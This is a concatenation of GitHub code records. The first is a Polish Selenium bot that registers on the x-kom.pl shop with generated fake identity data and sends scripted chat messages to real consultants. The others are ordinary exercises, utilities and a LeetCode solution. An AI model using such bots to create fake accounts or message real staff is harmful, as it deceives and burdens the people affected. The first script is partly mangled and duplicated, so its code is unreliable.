register(self):\n        \"\"\"ChromeDriverManager with install is all we need; presumably everyone uses or has the Google Chrome browser\n        For this example - I don't want to push .exe files (chromedriver.exe) to git\n\n        Since version 4.0 (sometime after New Year) the classic find_element_by_class_name can no longer be used ;_;\"\"\"\n\n        global browser\n        browser = webdriver.Chrome(ChromeDriverManager().install())\n        browser.implicitly_wait(10)\n        browser.get(\"https://www.x-kom.pl\")\n        browser.maximize_window()\n        time.sleep(3)\n\n        browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//div[@role='dialog']//button[.='W porządku']\").click()\n        browser.find_element(By.XPATH, \"/html//div[@id='app']/div[1]/header/div[1]/div[4]/div/div[2]/div/div[\"\n                                       \"1]/a[@href='/konto']\").click()\n        browser.find_element(By.XPATH, \"//div[@id='app']/div/div[1]/div/div[2]//a[@href='/rejestracja']\").click()\n        time.sleep(3)\n        browser.find_element(By.NAME, \"firstName\").send_keys(CreatePerson.first_name())\n        browser.find_element(By.NAME, \"lastName\").send_keys(CreatePerson.last_name())\n        browser.find_element(By.NAME, \"email\").send_keys(self.email_instance_user)\n        browser.find_element(By.NAME, \"password\").send_keys(CreatePerson.password())\n        browser.find_element(By.XPATH, \"/html//div[@id='app']/div/div[1]/div/div[1]//form//div[@class='ldtoi0-6 \"\n                                       \"loocTj']\").click()\n        browser.find_element(By.XPATH, \"//div[@id='app']/div/div[1]/div/div[1]//form//button[@type='submit']/span[\"\n                                       \".='Załóż konto']\").click()\n        browser.find_element(By.XPATH, \"/html//div[@id='app']/div[1]//a[@title='x-kom.pl']/span[1]/img[@alt='x-kom - \"\n                                       \"Sklep komputerowy']\").click()\n
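    # Hedged sketch (added for illustration; wait_and_click is hypothetical and unused): the\n    # repeated find_element(...).click() calls in this class are brittle, and an explicit wait\n    # is the usual Selenium idiom for React pages like this one.\n    def wait_and_click(self, xpath, timeout=10):\n        from selenium.webdriver.support.ui import WebDriverWait\n        from selenium.webdriver.support import expected_conditions as EC\n        WebDriverWait(browser, timeout).until(\n            EC.element_to_be_clickable((By.XPATH, xpath))).click()\n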
\"/html//div[@id='react-portals']//div[@role='dialog']//a[@href='/koszyk']\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[2]/div[1]/div[2]/div/div[1]/div[2]/div[3]/button\").click()\n\n def fill_data_in_cart(self):\n \"\"\"Wypełnimy jakieś dane, zobaczymy co się wydarzy\"\"\"\n browser.find_element(By.NAME, \"recipientName\").send_keys(CreatePerson.first_name() + \" \" + CreatePerson.last_name())\n browser.find_element(By.NAME, \"recipientStreet\").send_keys(CreatePerson.street() + \" \" + CreatePerson.house_number())\n browser.find_element(By.NAME, \"recipientPostalCode\").send_keys(CreatePerson.postal_code())\n browser.find_element(By.NAME, \"recipientCity\").send_keys(CreatePerson.city())\n browser.find_element(By.NAME, \"recipientEmail\").send_keys(self.email_instance_user)\n browser.find_element(By.NAME, \"recipientPhoneNumber\").send_keys(CreatePerson.phone())\n time.sleep(1)\n \"\"\"Przechodzimy do podsumowania\"\"\"\n\n \"\"\"X-Kom to react, co się objawia problemem z klikaniem kluczowych przcisków\"\"\"\n \"\"\"W taki sposób szukam rozwiązania\"\"\"\n aaa = browser.find_elements(By.XPATH, \"/html//div[@id='app']/div//form/div/div[3]/div/div[1]/div[4]/div[4]/button\")\n bbb = browser.find_elements(By.CSS_SELECTOR, \"[class='sc-15ih3hi-0 pvj85d-4 cCPDSX']\")\n ccc = browser.find_elements(By.CSS_SELECTOR, \".cCPDSX.pvj85d-4.sc-15ih3hi-0\")\n\n print(len(aaa))\n print(len(bbb)) # to printuje te jedynki\n print(len(ccc))\n\n \"\"\"Jest tyle opcji wyboru ponieważ nie zawsze działa jeden sposób ;_;\"\"\"\n if len(aaa) > 0:\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div//form/div/div[3]/div/div[1]/div[4]/div[4]/button\").click()\n return\n elif len(bbb) > 0:\n browser.find_element(By.CSS_SELECTOR, \"[class='sc-15ih3hi-0 pvj85d-4 cCPDSX']\").click()\n return\n elif len(ccc) > 0:\n browser.find_element(By.CSS_SELECTOR, \".cCPDSX.pvj85d-4.sc-15ih3hi-0\").click()\n\n def conversation(self):\n \"\"\"Moduł ten będzie prowadził rozmowę z konsultantem z x-kom'a\n Nie wiem czy to zadziała, pisze komentarz przed napisaniem kodu :O\n Ale mam ochotę dla prezentaji napisać banalnego bota\n Który wciśnie konsultantowi fotowoltaikę\n\n pro edit: myslę, że na potrzeby tego modułu zrobię osobny start dla rozmowy\n Będzie to moduł: start_convert\n Będzie w nim otwieranie przegladarki (instalacja drivera - max_window i inne)\n I od razu przejście do tego modułu\n Aby nie przechodzić całego procesu w klasie\"\"\"\n\n \"\"\"Zaczniemy od otwarcia komówrki z dymkiem\"\"\"\n browser.find_element(By.XPATH, \"//div[@id='react-portals']//button\").click()\n time.sleep(2)\n\n \"\"\"Teraz musimy znaleźć pole tekstowe i wprowadzić do niego wyrazy\n nalepiej zapisać to jako zmienna i się później odnosić do tego jako inputText\"\"\"\n \"\"\"test\"\"\"\n print(\"Zaczynamy odpytywnaie\")\n some_text = [\"Jesteś 2 w kolejce\",\n \"Niedługo połączy się z Tobą doradca.\"]\n boologic = False\n lenght = 0\n welcome = 0\n looking_for = 0 # kiedys się przydasz\n name = \"\"\n wait = 0\n priv_ask = 0\n while boologic != True:\n table = []\n print(f\"Zerujemu tablicę = {len(table)}\")\n print(f\"Nasza długość length wynosi = {lenght}\")\n\n \"\"\"Plan jest taki aby olać asynchroniczne moduły wraz z wbudowaną komendą od selenium\n W pętli while odpytujemy non stop stronę, xkom dodaje nowe pliki div i span z podobną klasą\n liczymy ile jest na stronie, kazda odpowiedź konsultanta to dodatkowy div/span\n Jeżeli zostanie wykryty > od poprzedniej puli to analizujemy tekst\"\"\"\n\n \"\"\"Pobieramy 
\n    def conversation(self):\n        \"\"\"This module will hold a conversation with an x-kom consultant\n        I don't know whether this will work, I'm writing the comment before writing the code :O\n        But for the demo I feel like writing a trivial bot\n        That will push photovoltaics onto the consultant\n\n        pro edit: I think that for the needs of this module I'll make a separate start for the conversation\n        It will be the module: start_convert\n        It will open the browser (driver install - max_window and the rest)\n        And jump straight into this module\n        So we don't walk through the whole flow in the class\"\"\"\n\n        \"\"\"We start by opening the bubble with the chat\"\"\"\n        browser.find_element(By.XPATH, \"//div[@id='react-portals']//button\").click()\n        time.sleep(2)\n\n        \"\"\"Now we have to find the text field and type words into it\n        best to store it as a variable and refer to it later as inputText\"\"\"\n        \"\"\"test\"\"\"\n        print(\"Starting the polling\")\n        some_text = [\"Jesteś 2 w kolejce\",\n                     \"Niedługo połączy się z Tobą doradca.\"]\n        boologic = False\n        lenght = 0\n        welcome = 0\n        looking_for = 0 # you'll come in handy some day\n        name = \"\"\n        wait = 0\n        priv_ask = 0\n        while boologic != True:\n            table = []\n            print(f\"Resetting the table = {len(table)}\")\n            print(f\"Our lenght value is = {lenght}\")\n\n            \"\"\"The plan is to skip the asynchronous modules and Selenium's built-in command\n            In the while loop we poll the page non stop; xkom adds new div and span elements with a similar class\n            we count how many are on the page, every consultant reply is an extra div/span\n            If more than the previous pool is detected, we analyze the text\"\"\"\n\n            \"\"\"Fetch the whole page\"\"\"\n            content = browser.page_source\n            \"\"\"content will be our request so we don't throw cookies around with requests\"\"\"\n\n            bs41 = BeautifulSoup(content, \"lxml\")\n            bs44 = bs41.body.find_all('span', {\"class\": \"sc-154u2ib-4 cDszJB\"})\n            \"\"\"As it turned out, there is a span tag whose class always has the same name and occurs only in this chat\"\"\"\n            # syntax = re.findall(\"^[sc-154u2ib-3] lenght and len(table) != 0:\n            if lenght < len(table):\n                \"\"\"We have to even this out here, otherwise there is no way to add it to lenght and our main if would always fire\"\"\"\n                lenght = 0\n                lenght += len(table)\n\n            if welcome == 0:\n                newtext[0].send_keys(\"Witam, mam pytanie dotyczące sprzętu, czy jestem połączony z konsultantem?\")\n                browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n                \"\"\"Make welcome non-zero so we don't fall into this condition again\"\"\"\n                welcome += 1\n                \"\"\"Set the first length of the table; every new message is another element\"\"\"\n                lenght += 1\n                print(f\"added 1 to lenght = {len(table)}\")\n\n            \"\"\"An exception arises: sometimes I may be somewhere in the queue, the element won't be 3 but 5\"\"\"\n            if name == \"\":\n                if some_text[0] in table or some_text[1] in table:\n                    if len(table) >= 4:\n                        \"\"\"Here we pull the consultant's name out of the chat\n                        It is usually the 3rd element of the list table, the name is at the end\"\"\"\n                        name = table[4][27:]\n                        print(f\"Got the consultant's name - {name}\")\n                        wait += 1\n                else:\n                    if len(table) == 3:\n                        \"\"\"Here we pull the consultant's name out of the chat\n                        It is usually the 3rd element of the list table, the name is at the end\n                        This else is for the case when I'm somewhere in the queue\"\"\"\n                        name = table[2][27:]\n                        print(f\"Got the consultant's name - {name}\")\n\n            if name != \"\":\n                if wait == 1:\n                    if len(table) == 6:\n                        print(\"Sending the first question about a photovoltaic inverter :)\")\n                        newtext[0].send_keys(f\"Cześć {name}, czy macie może w ofercie falowniki do fotowoltaiki?\")\n                        browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n                        lenght += 1\n                if wait == 0:\n                    if len(table) == 4:\n                        print(\"Sending the first question about a photovoltaic inverter :)\")\n                        newtext[0].send_keys(f\"Cześć {name}, czy macie może w ofercie falowniki do fotowoltaiki?\")\n                        browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n                        lenght += 1\n\n            if priv_ask == 0:\n                if wait == 1:\n                    if len(table) >= 7:\n                        print(\"Sending the second question about a photovoltaic inverter :)\")\n                        newtext[0].send_keys(f\"{name} a może sam szukasz godnego polecenia sprzętu do odbioru energii ze słońca?\"\n                                             f\"Chyba możemy się dogadać - dobrze, że się znaleźliśmy :D \")\n                        browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n                        lenght += 1\n                if wait == 0:\n                    if len(table) >= 6:\n                        print(\"Sending the second question about a photovoltaic inverter :)\")\n                        newtext[0].send_keys(\n                            f\"{name} a może sam szukasz godnego polecenia sprzętu do odbioru energii ze słońca?\"\n                            f\"Chyba możemy się dogadać - dobrze, że się znaleźliśmy :D \")\n                        browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n                        lenght += 1\n\n            \"\"\"I won't script this out any further so they don't block my IP or put me on a black_list\"\"\"\n            \"\"'This can be extended with ifs, or a class can be written for it, if someone wants to build ' \\\n            'a serious system of relations with the consultant'\n            \"\"\"I did this for fun, so with the ifs I only wanted to show that it can be done\"\"\"\n
            time.sleep(5)\n            time.sleep(5)\n            \"\"\"This is very important now: the list table is reset every cycle of the while loop, whereas the\n            lenght variable must keep the previous count of elements \"\"\"\n\n","repo_name":"ForAttention/GenZERO","sub_path":"data/xkom.py","file_name":"xkom.py","file_ext":"py","file_size_in_byte":14047,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"36826628031","text":"def leiaInt(str):\n    while True:\n        num = input(str)\n        if num.isnumeric():\n            return int(num)\n        print('\\033[31mValor Inválido!\\033[m')\n\n\nn = leiaInt('Digite um número : ')\nprint(f'Você digitou o número {n}')","repo_name":"CaNeoN28/MyPython","sub_path":"pythonExercicios/funções/ex104.py","file_name":"ex104.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"32612568138","text":"listaAlunos = []\nwhile True:\n    nome = (input('Nome: ').capitalize().strip())\n    nota1 = (float(input('Nota 1: ')))\n    nota2 = (float(input('Nota 2: ')))\n    media = (nota1 + nota2) / 2\n    listaAlunos.append([nome, [nota1, nota2], media])\n    opcao = input('Deseja continuar [S/N]? ').upper().strip()[0]\n    if 'N' in opcao:\n        break\nprint('-='*30)\nprint(f'{\"No.\":5}{\"NOME\"}{\"MÉDIA\":>15}')\nprint('-'*30)\nfor i, a in enumerate(listaAlunos):\n    print(f'{i:<5}{a[0]:16}{a[2]:.1f}')\nprint('-'*30)\nwhile True:\n    aluno = int(input('Mostrar notas de qual aluno [999 interrompe]? '))\n    if aluno == 999:\n        break\n    elif aluno <= len(listaAlunos) - 1:\n        print(f'Notas de {listaAlunos[aluno][0]} são {listaAlunos[aluno][1]}')\n    else:\n        print('No. inválido tente novamente!')\nprint('FINALIZANDO...')\nprint('<<<< VOLTE SEMPRE >>>>')\n","repo_name":"danoliveiradev/PythonExercicios","sub_path":"ex089.py","file_name":"ex089.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"40051052983","text":"##############################################################################\n# TITLE: Image Test\n# DESCRIPTION: Down-convert color range from full color to 8 colors\n# VERSION: 1.1\n# VERSION NOTES:\n#   Added show image at end and set file locations as variables\n# AUTHOR: Kenny Haynie\n##############################################################################\n\nfrom PIL import Image\nfrom datetime import datetime\n\ntestImageLocation='TestImages/test-lola.jpg'\nsaveLocation='Output/imageRGBredux'\n\n# Load Image\nim=Image.open(testImageLocation)\npix=im.load()\nprint(im.size)\n\n# Reduce image colors to 8 colors\nfor x in range(0, im.size[0]):\n    for y in range(0, im.size[1]):\n        r,g,b=pix[x,y]\n        if r > 122:\n            r0=255\n        else:\n            r0=0\n        if g > 122:\n            g0=255\n        else:\n            g0=0\n        if b > 122:\n            b0=255\n        else:\n            b0=0\n        pix[x,y]=(r0,g0,b0)\n\n# Save Image\nnow=datetime.now()\nfilename=str(saveLocation) + '_' + now.strftime(\"%Y%m%d%H%M%S\")+'.jpg'\nim.save(filename)\nim.show()\n","repo_name":"doctriam/python","sub_path":"ImageProcessing/BasicColorReduction.py","file_name":"BasicColorReduction.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
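The nested pixel loop in the record above can also be written without per-pixel Python. A hedged vectorized sketch of the same 8-color threshold using Pillow's per-band `point()` (illustration only; `reduce_to_8_colors` is not part of the original script):

from PIL import Image

def reduce_to_8_colors(img):
    # thresholds every channel at 122, matching the nested loop above
    return img.point(lambda v: 255 if v > 122 else 0)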
{"seq_id":"1605306675","text":"from setuptools import setup, find_packages\nimport os\n\ndef parse_requirements(req_file):\n    with open(req_file) as fp:\n        _requires = fp.read()\n    return _requires\n\n\nNAME = \"panoptic\"\nVERSION = \"0.1.1.dev3\"\n# Get dependencies from requirement files\nSETUP_REQUIRES = ['setuptools', 'setuptools-git', 'wheel']\nINSTALL_REQUIRES = parse_requirements('requirements.txt')\nLONG_DESCRIPTION = \"\"\n\nwith open(os.path.join(os.path.dirname(__file__), 'description.md'), 'r') as f:\n    LONG_DESCRIPTION = f.read()\n\ndef setup_package():\n    metadata = dict(name=NAME,\n                    version=VERSION,\n                    license='MPL-2.0 license',\n                    install_requires=INSTALL_REQUIRES,\n                    long_description=LONG_DESCRIPTION,\n                    long_description_content_type='text/markdown',\n                    setup_requires=SETUP_REQUIRES,\n                    entry_points={\n                        'console_scripts':[\n                            'panoptic = panoptic.main:start'\n                        ]\n                    },\n                    # include_package_data=True,\n                    # package_dir=\"panoptic/html\",\n                    package_data={\n                        \"\": ['html/*', 'html/assets/*', 'scripts/create_db.sql'],\n                    },\n                    packages=find_packages())\n\n    setup(**metadata)\n\n\ndef _copy_html_data(directory):\n    base_dir = os.path.join('', directory)\n    for (dirpath, dirnames, files) in os.walk(base_dir):\n        for f in files:\n            yield os.path.join(dirpath.split('/', 1)[1], f)\n\nif __name__ == \"__main__\":\n    setup_package()","repo_name":"CERES-Sorbonne/Panoptic","sub_path":"panoptic_back/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"11628588211","text":"#\n# @lc app=leetcode id=127 lang=python3\n#\n# [127] Word Ladder\n#\n\n# @lc code=start\nfrom collections import deque\n# NOTE: our algorithm treats the word list as a graph and does BFS on it\n'''\n          hit  (level 1)\n           |\n    ---------------\n    |    |    |   |\n   hot  git  hat hxt  (level 2)\n    |    |    |   |\n   dot  git  dat dxt  (level 3)\n    |         |   |\n   dog       dag dxt  (level 4)\n    |\n   cog   (level 5)\n\n\n\nBreadth-First Search (BFS) Approach:\nBFS is an algorithm used for traversing or searching tree or graph data structures. In this problem, BFS helps us efficiently find the shortest transformation sequence from the start word to the target word.\n\nBFS Algorithm:\n\nStart from the beginWord and add it to the queue along with its initial level, which is 1.\n\nWhile the queue is not empty, do the following:\na. Pop the front element (current word) and its level from the queue.\nb. Check if the current word is equal to the endWord. If it is, we have found the target word, and we can return the current level as the result.\nc. For each character in the current word, try all possible transformations by replacing it with all lowercase alphabets ('a' to 'z').\nd. If the new word (formed by the transformation) is in the word list, it means it is a valid word. Remove it from the word list to mark it as visited and avoid revisiting it.\ne. Add the new word and the incremented level to the queue for further exploration in the next BFS level.\nf. Continue the BFS traversal until either the endWord is found (in which case we return the level) or there are no more words left in the queue to explore.\ng. 
If we exhaust all possible transformations and cannot reach the endWord, we return 0, indicating that it is impossible to reach the target word.\n\nNow, let's examine the code for the BFS solution:\n\nfrom collections import deque\n\ndef ladderLength(beginWord, endWord, wordList):\n    if endWord not in wordList:\n        return 0\n\n    wordSet = set(wordList)\n    queue = deque([(beginWord, 1)])\n\n    while queue:\n        current_word, level = queue.popleft()\n\n        if current_word == endWord:\n            return level\n\n        for i in range(len(current_word)):\n            for char in 'abcdefghijklmnopqrstuvwxyz':\n                new_word = current_word[:i] + char + current_word[i+1:]\n                if new_word in wordSet:\n                    wordSet.remove(new_word)\n                    queue.append((new_word, level + 1))\n\n    return 0\n
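An optional optimization (added note, not part of the original explanation): instead of trying all 26 letters at every position, the word list can be bucketed once by wildcard patterns such as h*t, so each BFS step only visits real neighbors:\n\nfrom collections import defaultdict\n\ndef build_buckets(word_list):\n    buckets = defaultdict(list)  # e.g. 'h*t' -> ['hot', 'hat']\n    for w in word_list:\n        for i in range(len(w)):\n            buckets[w[:i] + '*' + w[i + 1:]].append(w)\n    return buckets\n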
Explanation of the Code:\n\nThe function ladderLength(beginWord, endWord, wordList) takes the beginWord and endWord as the start and target words, respectively, and wordList as a list of words in the dictionary.\n\nIf the endWord is not in the wordList, it is impossible to reach the target word, so the function returns 0.\n\nWe create a wordSet to store the words in the wordList for efficient lookup during BFS. This helps us quickly check if a word is in the dictionary and if it has been visited.\n\nWe use a queue to perform BFS traversal. Each element in the queue is a tuple containing the current word and the level (number of transformations) it is at.\n\nWe add the beginWord to the queue with an initial level of 1.\n\nWhile the queue is not empty, we pop the front element (current word) and its level from the queue.\n\nWe check if the current word is equal to the endWord. If it is, we have found the target word, so we return the current level as the result.\n\nFor each character in the current word, we try all possible transformations by replacing it with all lowercase alphabets ('a' to 'z').\n\nIf the new word (formed by the transformation) is in the wordSet, it means it is a valid word in the dictionary. We remove it from the wordSet to mark it as visited and avoid revisiting it.\n\nWe add the new word and the incremented level to the queue for further exploration in the next BFS level.\n\nThe BFS traversal continues until either the endWord is found (in which case we return the level) or there are no more words left in the queue to explore.\n\nIf we exhaust all possible transformations and cannot reach the endWord, we return 0, indicating that it is impossible to reach the target word.\n\nExample:\nLet's use the example we discussed earlier to illustrate how the BFS algorithm works:\n\nwordList = [\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"]\nbeginWord = \"hit\"\nendWord = \"cog\"\nInitially, the queue contains the tuple (\"hit\", 1) with the level set to 1.\n\nPop the front element (\"hit\", 1) from the queue.\nTry all possible transformations of \"hit\": \"ait\", \"bit\", ..., \"zit\", \"hat\", \"hbt\", ..., \"hzt.\"\nSince \"hot\" and \"hat\" are valid words, add them to the queue with their respective levels: (\"hot\", 2) and (\"hat\", 2).\nThe queue now contains two elements: (\"hot\", 2) and (\"hat\", 2).\nPop the front element (\"hot\", 2) from the queue.\nTry all possible transformations of \"hot\": \"aot\", \"bot\", ..., \"zot\", \"hot\", \"hob\", ..., \"hoz.\"\nSince \"dot\" is a valid word, add it to the queue with its level: (\"dot\", 3).\nThe queue now contains two elements: (\"hat\", 2) and (\"dot\", 3).\nContinue the BFS traversal, exploring all possible transformations and adding valid words to the queue.\nEventually, we find the endWord \"cog\" at level 5, and we return the level 5 as the minimum number of transformations required to reach the target word.\nIn this example, the shortest transformation sequence is \"hit\" -> \"hot\" -> \"dot\" -> \"dog\" -> \"cog\", a sequence of 5 words.\n\nThe BFS approach efficiently finds the shortest transformation sequence by exploring nodes in the same level before moving to the next level, making it the preferred approach for this problem.\n'''\nclass Solution:\n    def ladderLength(self,beginWord, endWord, wordList):\n        # If the endWord is not in the wordList, it is impossible to reach the target word\n        if endWord not in wordList:\n            return 0\n\n        # Convert the wordList to a set for faster lookup\n        wordSet = set(wordList)\n\n        # Create a queue for BFS traversal. 
Each element in the queue is a tuple containing the current word and its level.\n queue = deque([(beginWord, 1)])\n\n while queue:\n # Pop the front element (current word) and its level from the queue\n current_word, level = queue.popleft()\n\n # If the current word is equal to the endWord, we have found the target word\n if current_word == endWord:\n return level\n\n # Try all possible transformations of the current word by replacing each character with 'a' to 'z'\n for i in range(len(current_word)):\n for char in 'abcdefghijklmnopqrstuvwxyz':\n # Form a new word by replacing the character at index 'i' with 'char'\n new_word = current_word[:i] + char + current_word[i+1:]\n\n # If the new word is in the wordSet (valid word in the dictionary), we remove it from the wordSet to mark it as visited\n if new_word in wordSet:\n wordSet.remove(new_word)\n\n # Add the new word and the incremented level to the queue for further exploration in the next BFS level\n queue.append((new_word, level + 1))\n\n # If we exhaust all possible transformations and cannot reach the endWord, return 0 (impossible to reach the target word)\n return 0 \n# @lc code=end\n\n","repo_name":"AyushKumar1810/.leetcode","sub_path":"127.word-ladder.py","file_name":"127.word-ladder.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3124419608","text":"from django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.http import JsonResponse\nfrom django.template import loader\nfrom django.views import generic\n\nfrom .forms import CallbackForm, FeedbackForm\n\n__all__ = ['EmailFormData', 'RequestCallback', 'RequestFeedback']\n\n\nclass EmailFormData(generic.CreateView):\n \"\"\"\n Base class for views sending form-based emails.\n\n Meant to be subclassed. The child classes are required to set\n `email_recipients`, `email_subject_template`, `email_template_html` and\n `email_template_plain` class attributes.\n\n The `form_valid()` method should be extended to set `email_context`\n attribute. 
Its value is passed to the email templates as the context.\n \"\"\"\n http_method_names = [\"post\"]\n email_from = settings.EMAIL_HOST_USER\n email_recipients = []\n email_context = {}\n email_subject_template = ''\n email_template_html = ''\n email_template_plain = ''\n\n def form_invalid(self, form):\n return JsonResponse(\n {\"ok\": False, \"errors\": form.errors},\n status=400,\n )\n\n def form_valid(self, form):\n context = self.email_context\n\n email_subject = loader.get_template(\n self.email_subject_template\n ).render(context)\n\n email_plain = loader.get_template(\n self.email_template_plain\n ).render(context)\n\n email_html = loader.get_template(\n self.email_template_html\n ).render(context)\n\n delivered_msg_count = send_mail(\n from_email=self.email_from,\n recipient_list=self.email_recipients,\n subject=email_subject,\n message=email_plain,\n html_message=email_html,\n )\n if delivered_msg_count == 0:\n return JsonResponse(\n {\"ok\": False,\n \"errors\": [\"Email notification was not delivered\"]},\n status=500,\n )\n return JsonResponse({\"ok\": True})\n\n\nclass RequestCallback(EmailFormData):\n \"\"\"\n Email a call-back request.\n \"\"\"\n form_class = CallbackForm\n email_recipients = settings.CALLBACK_REQUEST_RECIPIENTS\n email_subject_template = 'contacts/callback_alert_subject.txt'\n email_template_plain = 'contacts/callback_alert.txt'\n email_template_html = 'contacts/callback_alert.html'\n\n def form_valid(self, form):\n form.save()\n self.email_context = {\n 'name': form.cleaned_data['name'],\n 'phone': form.cleaned_data['phone'],\n 'comment': form.cleaned_data['comment'],\n 'site': self.request.site,\n }\n return super().form_valid(form)\n\n\nclass RequestFeedback(EmailFormData):\n \"\"\"\n Email a feedback message.\n \"\"\"\n form_class = FeedbackForm\n email_recipients = settings.FEEDBACK_REQUEST_RECIPIENTS\n email_subject_template = 'contacts/feedback_alert_subject.txt'\n email_template_plain = 'contacts/feedback_alert.txt'\n email_template_html = 'contacts/feedback_alert.html'\n\n def form_valid(self, form):\n form.save()\n msg_type = form.cleaned_data['msg_type']\n self.email_context = {\n 'msg_type': form.instance.MsgTypes(msg_type).label,\n 'msg': form.cleaned_data['msg'],\n 'email': form.cleaned_data['email'],\n 'name': form.cleaned_data['name'],\n 'site': self.request.site,\n }\n return super().form_valid(form)","repo_name":"nevimov/otkaz","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8307430907","text":"import torch\nimport torch.nn as nn\nfrom models.utils import get_knn_pts, index_points\nfrom einops import repeat, rearrange\nfrom models.pointops.functions import pointops\n\n\nclass Point3DConv(nn.Module):\n def __init__(self, args):\n super(Point3DConv, self).__init__()\n\n self.k = args.k\n self.args = args\n self.conv_delta = nn.Sequential(\n nn.Conv2d(3, args.growth_rate, 1),\n nn.BatchNorm2d(args.growth_rate),\n nn.ReLU(inplace=True)\n )\n self.conv_feats = nn.Sequential(\n nn.Conv2d(args.bn_size * args.growth_rate, args.growth_rate, 1),\n nn.BatchNorm2d(args.growth_rate),\n nn.ReLU(inplace=True)\n )\n self.post_conv = nn.Sequential(\n nn.Conv2d(args.growth_rate, args.growth_rate, 1),\n nn.BatchNorm2d(args.growth_rate),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, feats, pts, knn_idx=None):\n # input: (b, c, n)\n\n if knn_idx == None:\n # (b, 3, n, k), (b, n, k)\n knn_pts, knn_idx 
= get_knn_pts(self.k, pts, pts, return_idx=True)\n else:\n knn_pts = index_points(pts, knn_idx)\n # (b, 3, n, k)\n knn_delta = knn_pts - pts[..., None]\n # (b, c, n, k)\n knn_delta = self.conv_delta(knn_delta)\n # (b, c, n, k)\n knn_feats = index_points(feats, knn_idx)\n # (b, c, n, k)\n knn_feats = self.conv_feats(knn_feats)\n # multiply: (b, c, n, k)\n new_feats = knn_delta * knn_feats\n # (b, c, n, k)\n new_feats = self.post_conv(new_feats)\n # sum: (b, c, n)\n new_feats = new_feats.sum(dim=-1)\n return new_feats\n\n\nclass DenseLayer(nn.Module):\n def __init__(self, args, input_dim):\n super(DenseLayer, self).__init__()\n\n self.conv_bottle = nn.Sequential(\n nn.Conv1d(input_dim, args.bn_size * args.growth_rate, 1),\n nn.BatchNorm1d(args.bn_size * args.growth_rate),\n nn.ReLU(inplace=True)\n )\n self.point_conv = Point3DConv(args)\n\n def forward(self, feats, pts, knn_idx=None):\n # input: (b, c, n)\n\n new_feats = self.conv_bottle(feats)\n # (b, c, n)\n new_feats = self.point_conv(new_feats, pts, knn_idx)\n # concat\n return torch.cat((feats, new_feats), dim=1)\n\n\nclass DenseUnit(nn.Module):\n def __init__(self, args):\n super(DenseUnit, self).__init__()\n\n self.dense_layers = nn.ModuleList([])\n for i in range(args.layer_num):\n self.dense_layers.append(DenseLayer(args, args.feat_dim + i * args.growth_rate))\n\n def forward(self, feats, pts, knn_idx=None):\n # input: (b, c, n)\n\n for dense_layer in self.dense_layers:\n new_feats = dense_layer(feats, pts, knn_idx)\n feats = new_feats\n return feats\n\n\nclass Transition(nn.Module):\n def __init__(self, args):\n super(Transition, self).__init__()\n\n input_dim = args.feat_dim + args.layer_num * args.growth_rate\n self.trans = nn.Sequential(\n nn.Conv1d(input_dim, args.feat_dim, 1),\n nn.BatchNorm1d(args.feat_dim),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, feats):\n # input: (b, c, n)\n\n new_feats = self.trans(feats)\n return new_feats\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, args):\n super(FeatureExtractor, self).__init__()\n\n self.k = args.k\n self.conv_init = nn.Sequential(\n nn.Conv1d(3, args.feat_dim, 1),\n nn.BatchNorm1d(args.feat_dim),\n nn.ReLU(inplace=True)\n )\n self.dense_blocks = nn.ModuleList([])\n for i in range(args.block_num):\n self.dense_blocks.append(nn.ModuleList([\n DenseUnit(args),\n Transition(args)\n ]))\n\n def forward(self, pts):\n # input: (b, 3, n)\n\n # get knn_idx: (b, n, 3)\n pts_trans = rearrange(pts, 'b c n -> b n c').contiguous()\n # (b, m, k)\n knn_idx = pointops.knnquery_heap(self.k, pts_trans, pts_trans).long()\n # (b, c, n)\n init_feats = self.conv_init(pts)\n local_feats = []\n local_feats.append(init_feats)\n # local features\n for dense_block, trans in self.dense_blocks:\n new_feats = dense_block(init_feats, pts, knn_idx)\n new_feats = trans(new_feats)\n init_feats = new_feats\n local_feats.append(init_feats)\n # global features: (b, c)\n global_feats = init_feats.max(dim=-1)[0]\n return global_feats, local_feats\n","repo_name":"yunhe20/Grad-PU","sub_path":"models/FeatureExtractor.py","file_name":"FeatureExtractor.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"34"} +{"seq_id":"18233770360","text":"from drawing import Drawing\r\nfrom factory import PickerFactory\r\nfrom randomPicker import RandomPicker\r\n\r\n\r\nif __name__ == \"__main__\":\r\n d = {\"picksPerDrawing\": 5, \"altReds\": False}\r\n\r\n # Test creating pickers\r\n\r\n\r\n # Test factory\r\n pf = 
